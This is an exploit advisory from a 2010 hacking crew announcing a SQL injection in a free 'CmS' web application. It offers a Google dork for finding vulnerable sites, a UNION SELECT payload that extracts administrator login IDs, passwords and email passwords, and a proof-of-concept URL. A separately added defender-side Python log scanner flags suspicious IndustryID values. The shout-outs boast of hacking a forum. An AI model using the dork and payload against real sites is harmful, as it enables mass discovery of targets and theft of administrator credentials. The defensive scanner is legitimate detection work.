-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------

Exploitz:
~~~~~~~

union all select 1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from admin--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
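
Defender-side check for the injection point above, added here as an example that is not part of the original advisory: it scans web access log lines for category.php requests whose IndustryID value is not a plain integer. The combined log format, the function names, the sample lines and the premise that a legitimate IndustryID is always numeric are assumptions of this example, not statements from the advisory or the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def industry_id_values(target):
    """Return the IndustryID values of a category.php request target, else []."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/category.php"):
        return []
    # parse_qsl percent-decodes and turns '+' into a space. The advisory spells the
    # name both "IndustrYID" and "IndustryID", so compare it case-insensitively.
    return [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower() == "industryid"]

def is_valid_industry_id(value):
    """Allow-list: a plain decimal integer (assumed shape of a legitimate id)."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for each request with a non-numeric id."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for value in industry_id_values(match.group(1)):
            if not is_valid_industry_id(value):
                findings.append((number, value))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Apr/2010:10:00:01 +0700] "GET /shop/category.php?IndustryID=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Apr/2010:10:00:09 +0700] "GET /shop/category.php?IndustryID=7%20union%20all%20select%201,2,3-- HTTP/1.1" 200 5533',
    '192.0.2.44 - - [22/Apr/2010:10:00:12 +0700] "GET /shop/Category.php?IndustrYID=-1+UNION+ALL+SELECT+1,2,3-- HTTP/1.1" 200 5533',
    '192.0.2.10 - - [22/Apr/2010:10:00:20 +0700] "GET /shop/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: non-numeric IndustryID {value!r}")
```

The same allow-list, applied in the application before the value reaches the query and combined with a bound parameter, closes the injection point itself.
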
----------------------------------------------------------------

Shoutz:
~~~~

- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
-hendri_note: don't sulk so much, bro, it's embarrassing at your age.. bruakkakaka
- #devilzc0de @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
Homepage: http://devilzc0de.org

---------------------------[EOF]--------------------------------